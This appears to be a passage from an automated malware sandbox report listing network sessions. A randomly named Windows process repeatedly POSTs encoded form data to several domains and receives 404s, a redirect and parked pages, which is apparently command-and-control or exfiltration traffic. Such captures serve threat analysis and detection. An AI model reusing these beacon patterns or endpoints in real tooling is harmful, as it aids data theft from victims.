                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.ladylawher.org
                                                                                                                                            Referer: http://www.ladylawher.org/tcwz/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Ascii: -v4puN=a70lKoXRNM+dkwWU6ur1wj/pnoOYpkrYs4AJeUhSHRwwON+QwcJwFdEqFKCu6mkxO6qi13U4rBJ7ohrD3gI0MGNszR/q1lQ/2GmVUjSYx/XAboCTYwkJe3brxlNCv+JgF9bRRd5Tk/WkFwCLz6ObHvLJpjK3Z/xys/8Ss261UU9H8Jecf0rG1ndY3mBCR/5dJ0CVai4=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49983 | 3.33.130.190 | 80 | 764 | C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 13:28:11.899844885 CEST | 711 | OUT | POST /tcwz/ HTTP/1.1
                                                                                                                                            Host: www.ladylawher.org
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 227
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.ladylawher.org
                                                                                                                                            Referer: http://www.ladylawher.org/tcwz/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Ascii: -v4puN=a70lKoXRNM+dijOU5Jf1yD/mjYOY8Urcs4MJeQ58HjUwOpuQxehwL9EqNqCv0GkuO6nR13o4rBd7ogbD2Xc7OWNq7x/o2VQ/2GmVUi22x7DAbYyTCVIIQXbq5FNC4uJkF9a2RYZ5k7mkF1mL242YMvLH3TLBaP4srMEQlkvGPiM70fv2FWjumHxgn1J1APY0TXSlE1tUjDVV7n3pDzfCGNyvqLzR


Session ID: 7 | Source IP: 192.168.2.5 | Source Port: 49984 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 764 | Process: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
Timestamp: Oct 22, 2024 13:28:14.451106071 CEST | Bytes transferred: 1728 | Direction: OUT | Data:
POST /tcwz/ HTTP/1.1
                                                                                                                                            Host: www.ladylawher.org
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 1243
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.ladylawher.org
                                                                                                                                            Referer: http://www.ladylawher.org/tcwz/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
Data Ascii: -v4puN= [TRUNCATED]


Session ID: 8 | Source IP: 192.168.2.5 | Source Port: 49985 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 764 | Process: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
Timestamp: Oct 22, 2024 13:28:16.994504929 CEST | Bytes transferred: 432 | Direction: OUT | Data:
GET /tcwz/?vd=fhUlwfGxBn-tt&-v4puN=X5cFJf7HFuS/xVOc5sSh+Hrfp4eRpmHBiZNITnwuLXQtfpi955BzQ8MtI/Oo5RgXSpSv2VRHuXNT9Azn4jxaM1RW1Sv60yoj6GSBXC/EsqLKRI7QEkNRexaswW0RsPsQQg== HTTP/1.1
                                                                                                                                            Host: www.ladylawher.org
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Connection: close
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
Timestamp: Oct 22, 2024 13:28:17.622266054 CEST | Bytes transferred: 411 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                            Server: openresty
                                                                                                                                            Date: Tue, 22 Oct 2024 11:28:17 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 271
                                                                                                                                            Connection: close
                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?vd=fhUlwfGxBn-tt&-v4puN=X5cFJf7HFuS/xVOc5sSh+Hrfp4eRpmHBiZNITnwuLXQtfpi955BzQ8MtI/Oo5RgXSpSv2VRHuXNT9Azn4jxaM1RW1Sv60yoj6GSBXC/EsqLKRI7QEkNRexaswW0RsPsQQg=="}</script></head></html>


Session ID: 9 | Source IP: 192.168.2.5 | Source Port: 49986 | Destination IP: 195.110.124.133 | Destination Port: 80 | PID: 764 | Process: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
Timestamp: Oct 22, 2024 13:28:22.723154068 CEST | Bytes transferred: 703 | Direction: OUT | Data:
POST /8gyb/ HTTP/1.1
                                                                                                                                            Host: www.nutrigenfit.online
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 207
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.nutrigenfit.online
                                                                                                                                            Referer: http://www.nutrigenfit.online/8gyb/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Ascii: -v4puN=lFjuPzzfjzwVGRm0UT7Z6x06g3gOUfWiYUCYzuk0yldRWURvie4a7HBDpFi3PzUssin6FGxyaWtDDcGeENR52E4q2RWYYs8ejDITy4kPsNxX4bI8nWd5Vs3zRwc7Yi4iBHXbwhZV4tRPQbdsL3bhpmVOuTVrYLlm1v0nh5xm5lP4xLs9Jut1cBZL5/fr9oOX/ZRfmpg=
Timestamp: Oct 22, 2024 13:28:23.548450947 CEST | Bytes transferred: 367 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                                                            Date: Tue, 22 Oct 2024 11:28:23 GMT
                                                                                                                                            Server: Apache
                                                                                                                                            Content-Length: 203
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /8gyb/ was not found on this server.</p></body></html>


Session ID: 10 | Source IP: 192.168.2.5 | Source Port: 49987 | Destination IP: 195.110.124.133 | Destination Port: 80 | PID: 764 | Process: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
Timestamp: Oct 22, 2024 13:28:25.265639067 CEST | Bytes transferred: 723 | Direction: OUT | Data:
POST /8gyb/ HTTP/1.1
                                                                                                                                            Host: www.nutrigenfit.online
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 227
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.nutrigenfit.online
                                                                                                                                            Referer: http://www.nutrigenfit.online/8gyb/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Ascii: -v4puN=lFjuPzzfjzwVGxW0VwTZvh09sXgONvWmYU+YzrBvxTlRTHFvjf4a+HBDmlj9SjVBsirEFDJyaSNDDZ6eEep43U4s9xWaWM8ejDITy4wlsN5X4qY8m014cM3wHgc7Py4mBHW0wkky4rdPQatsIjPgnmVUjzU9Yo48zpBypII4mkPhw9dXTMldPh1zpsXcsYv+l6Bv4+3rQdOUhKMBpwIWA/J4qhTK
Timestamp: Oct 22, 2024 13:28:26.106281042 CEST | Bytes transferred: 367 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                                                            Date: Tue, 22 Oct 2024 11:28:25 GMT
                                                                                                                                            Server: Apache
                                                                                                                                            Content-Length: 203
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /8gyb/ was not found on this server.</p></body></html>


Session ID: 11 | Source IP: 192.168.2.5 | Source Port: 49988 | Destination IP: 195.110.124.133 | Destination Port: 80 | PID: 764 | Process: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
Timestamp: Oct 22, 2024 13:28:27.812515020 CEST | Bytes transferred: 1740 | Direction: OUT | Data:
POST /8gyb/ HTTP/1.1
                                                                                                                                            Host: www.nutrigenfit.online
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 1243
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.nutrigenfit.online
                                                                                                                                            Referer: http://www.nutrigenfit.online/8gyb/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Ascii: -v4puN=lFjuPzzfjzwVGxW0VwTZvh09sXgONvWmYU+YzrBvxQFRTXZvscQa9HBDvFj+SjV5sizAFDNiaUBDC7ieQ/p4+U4syRWbYs8ujDYfy4glsN5X4pw8gmd4Qs3zRwc/Yi4eBB+Owl0I479PQ69sOQ3gvmVSgzU1Yo1izp0cpI8emj7hxMwKDv9BYStghOm/7uf/v4J87seMT9b5qssR6T1lCZJ/ikuZqGo1JVJkMTYMsuVtGmrOY+slXrbWNx8t6ks97FnhhgcFYiK/r8/rklqPKmwNQtxlS9sOCoLhBqUylE4ce1Z/JjkMqleXbxrg1fQfuge9N8eobC1y1dJWMVitqyJGkyVJy5ELC+hr6jOqCjovypd1wnB9sY6MHO1UOsEkwPW/k46RdHbhg7wuknX9Cd3XB/831R8IgjNVyhQwtU5G3ppf0rXk+W8zm9Msm5Q9WC3fUxghEu1Kxzu5Bfbu9gYMRwN2uhhZQH3TyPKSRpyx2QBz5NRYKwnOHxI+5fbEw1kMs+suXUeuuV0suzj+qQoyfa0M6N5wTqyaS7L0nUKfmredhhznyl2y7/tSd8nnCP+vQrUjulwUbWvG+Q7hiewslGX7nkyySxXpzV6+qDPGR1qSQvpkPLXZuTdqO419uDbBAa+RoWZSm/BWd4SQqLfWQ+ZDwN8X0Q1P1ClZm6GiYZn5ONb2SwbU3FDeE8QKrW5NzN0Jv2WEdfC5Sjg92v9EbCfjdJ//1csR6vr58SS52ge+p0pykEyfoBt9J45s336bc3noOVkkFXi+ME3JwKzEEXTVEXZC4FhKtYMw0rXzUASAk/xY/mHw07GkwboPYg7r91zCM7s00kssUA7j+dImnsCJJr1hm56ByeCnMl/PzA5IjdgXnJvs0LUUTic4j6F5IHYggOYT02TnybbgoRI27fCaRRILoUeQo2wWdDV+nqUStyQ+rynUIjsQfkKZUHUeAQtR7aBiAikLxnJxq5BQhpkFB2j2l/9uiVdj/1z1o [TRUNCATED]
Timestamp: Oct 22, 2024 13:28:28.654702902 CEST | Bytes transferred: 367 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                                                            Date: Tue, 22 Oct 2024 11:28:28 GMT
                                                                                                                                            Server: Apache
                                                                                                                                            Content-Length: 203
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /8gyb/ was not found on this server.</p></body></html>


Session ID: 12 | Source IP: 192.168.2.5 | Source Port: 49989 | Destination IP: 195.110.124.133 | Destination Port: 80 | PID: 764 | Process: C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
Timestamp: Oct 22, 2024 13:28:30.352997065 CEST | Bytes transferred: 436 | Direction: OUT | Data:
GET /8gyb/?-v4puN=oHLOMFnpuCQwEmmcfjaPzEs/vXwrZtaPQF7csdtv5Eh2A0RcvZoTiB5djAiNITJM5AjEN183LiB5K62qTN14+moW7AK7WqEInxUu+7Nqydpi+78xinwtbpXqTzluMhpRfQ==&vd=fhUlwfGxBn-tt HTTP/1.1
                                                                                                                                            Host: www.nutrigenfit.online
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Connection: close
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
Oct 22, 2024 13:28:31.201189995 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                                                                                                            Date: Tue, 22 Oct 2024 11:28:31 GMT
                                                                                                                                            Server: Apache
                                                                                                                                            Content-Length: 203
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /8gyb/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49990 | 199.59.243.227 | 80 | 764 | C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 13:28:36.430651903 CEST | 700 | OUT | POST /rod1/ HTTP/1.1
                                                                                                                                            Host: www.gold-rates.online
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 207
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.gold-rates.online
                                                                                                                                            Referer: http://www.gold-rates.online/rod1/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Ascii: -v4puN=30RMjENekML1WrMzjNLG+zA0vytOmYteVg3arGMGXCyHEO0OjPF6R/5mrdF7QMlMDkW05R0IKRLDkA3QQv3oAatyffWCCRngcpTqGxJQbSBK2WUcVU3JXSNWwJEA8baXZQljEZFdvM/e1yCtlQBWDdJfL/dIHRzt68mxHEudT9yYHUCbDiGtl39Yp/YqQ7E186GqJyA=
Oct 22, 2024 13:28:37.055794001 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                            date: Tue, 22 Oct 2024 11:28:36 GMT
                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                            content-length: 1138
                                                                                                                                            x-request-id: 208f00f2-e07c-4f36-82a2-841f0f17a7a8
                                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kfxQN9HaLXRTrNBaelyr30O4whnvOtqRVvdEHA90GUxBMJJFvP4hjF4vH6AGZQ5QR/0UOeXUB/j/H/MYeS1Grw==
                                                                                                                                            set-cookie: parking_session=208f00f2-e07c-4f36-82a2-841f0f17a7a8; expires=Tue, 22 Oct 2024 11:43:36 GMT; path=/
                                                                                                                                            connection: close
                                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kfxQN9HaLXRTrNBaelyr30O4whnvOtqRVvdEHA90GUxBMJJFvP4hjF4vH6AGZQ5QR/0UOeXUB/j/H/MYeS1Grw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 22, 2024 13:28:37.055828094 CEST | 591 | IN |
                                                                                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjA4ZjAwZjItZTA3Yy00ZjM2LTgyYTItODQxZjBmMTdhN2E4IiwicGFnZV90aW1lIjoxNzI5NTk2NT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49991 | 199.59.243.227 | 80 | 764 | C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 13:28:39.118401051 CEST | 720 | OUT | POST /rod1/ HTTP/1.1
                                                                                                                                            Host: www.gold-rates.online
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 227
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.gold-rates.online
                                                                                                                                            Referer: http://www.gold-rates.online/rod1/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Ascii: -v4puN=30RMjENekML1UIEzlsLGvjArzitOzItgVgLarCVZQwGHErIOiKx6W/5mg9F+eslHDkLL5V0IKRfDkFLQQYDrAKsUS/WcPxngcpTqGy16bSJK2jEcVwjKLiNXn5EAtLbeZQlREbwGvOHe1zytkBBRQ9JVBfcPAi2V/eX8MybILPqsCizxZAOF2XRg5sQdBLlcmZWaXlVc78wQ61HPBmRvYzAVWxc0
Oct 22, 2024 13:28:39.732848883 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                            date: Tue, 22 Oct 2024 11:28:39 GMT
                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                            content-length: 1138
                                                                                                                                            x-request-id: 6a5b2875-f055-4126-9a8c-39dd872d7c50
                                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kfxQN9HaLXRTrNBaelyr30O4whnvOtqRVvdEHA90GUxBMJJFvP4hjF4vH6AGZQ5QR/0UOeXUB/j/H/MYeS1Grw==
                                                                                                                                            set-cookie: parking_session=6a5b2875-f055-4126-9a8c-39dd872d7c50; expires=Tue, 22 Oct 2024 11:43:39 GMT; path=/
                                                                                                                                            connection: close
                                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kfxQN9HaLXRTrNBaelyr30O4whnvOtqRVvdEHA90GUxBMJJFvP4hjF4vH6AGZQ5QR/0UOeXUB/j/H/MYeS1Grw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 22, 2024 13:28:39.732882023 CEST | 591 | IN |
                                                                                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmE1YjI4NzUtZjA1NS00MTI2LTlhOGMtMzlkZDg3MmQ3YzUwIiwicGFnZV90aW1lIjoxNzI5NTk2NT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 49992 | 199.59.243.227 | 80 | 764 | C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 13:28:41.704377890 CEST | 1737 | OUT | POST /rod1/ HTTP/1.1
                                                                                                                                            Host: www.gold-rates.online
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 1243
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.gold-rates.online
                                                                                                                                            Referer: http://www.gold-rates.online/rod1/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
Data Ascii: -v4puN= [TRUNCATED]
Oct 22, 2024 13:28:42.316020966 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                            date: Tue, 22 Oct 2024 11:28:41 GMT
                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                            content-length: 1138
                                                                                                                                            x-request-id: 3c9d679b-78f0-4444-9172-116e8ca8fc2b
                                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kfxQN9HaLXRTrNBaelyr30O4whnvOtqRVvdEHA90GUxBMJJFvP4hjF4vH6AGZQ5QR/0UOeXUB/j/H/MYeS1Grw==
                                                                                                                                            set-cookie: parking_session=3c9d679b-78f0-4444-9172-116e8ca8fc2b; expires=Tue, 22 Oct 2024 11:43:42 GMT; path=/
                                                                                                                                            connection: close
                                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kfxQN9HaLXRTrNBaelyr30O4whnvOtqRVvdEHA90GUxBMJJFvP4hjF4vH6AGZQ5QR/0UOeXUB/j/H/MYeS1Grw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 22, 2024 13:28:42.316083908 CEST | 591 | IN |
                                                                                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiM2M5ZDY3OWItNzhmMC00NDQ0LTkxNzItMTE2ZThjYThmYzJiIiwicGFnZV90aW1lIjoxNzI5NTk2NT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 49993 | 199.59.243.227 | 80 | 764 | C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 13:28:44.243376017 CEST | 435 | OUT | GET /rod1/?vd=fhUlwfGxBn-tt&-v4puN=625sgw1Vn/LiYNFkuNXWgUQa6VpWz6NoZgO4nBFbZUGQF7cSiahkAd5Np5VrTvFPZWnEzDVMZ2bBqmHKU8WTD6xVXOOHKx/2RY/6WwAhCi5V31VMR0XJVnQWnK4Gp4bSPg== HTTP/1.1
                                                                                                                                            Host: www.gold-rates.online
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Connection: close
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Oct 22, 2024 13:28:44.868266106 CEST    1236    IN    HTTP/1.1 200 OK
                                                                                                                                            date: Tue, 22 Oct 2024 11:28:44 GMT
                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                            content-length: 1518
                                                                                                                                            x-request-id: bab4616a-4c7c-44ac-b2a3-729c58cc3017
                                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kFPoV5Jp3JkIGuNBgwCmsH+juodcp2L4lvG5oqomg770LDlwEqRpm+1c9hhl/oELI7LMRYnEaibFMWHzuHrtOw==
                                                                                                                                            set-cookie: parking_session=bab4616a-4c7c-44ac-b2a3-729c58cc3017; expires=Tue, 22 Oct 2024 11:43:44 GMT; path=/
                                                                                                                                            connection: close
                                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kFPoV5Jp3JkIGuNBgwCmsH+juodcp2L4lvG5oqomg770LDlwEqRpm+1c9hhl/oELI7LMRYnEaibFMWHzuHrtOw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                            Oct 22, 2024 13:28:44.868330956 CEST    971    IN
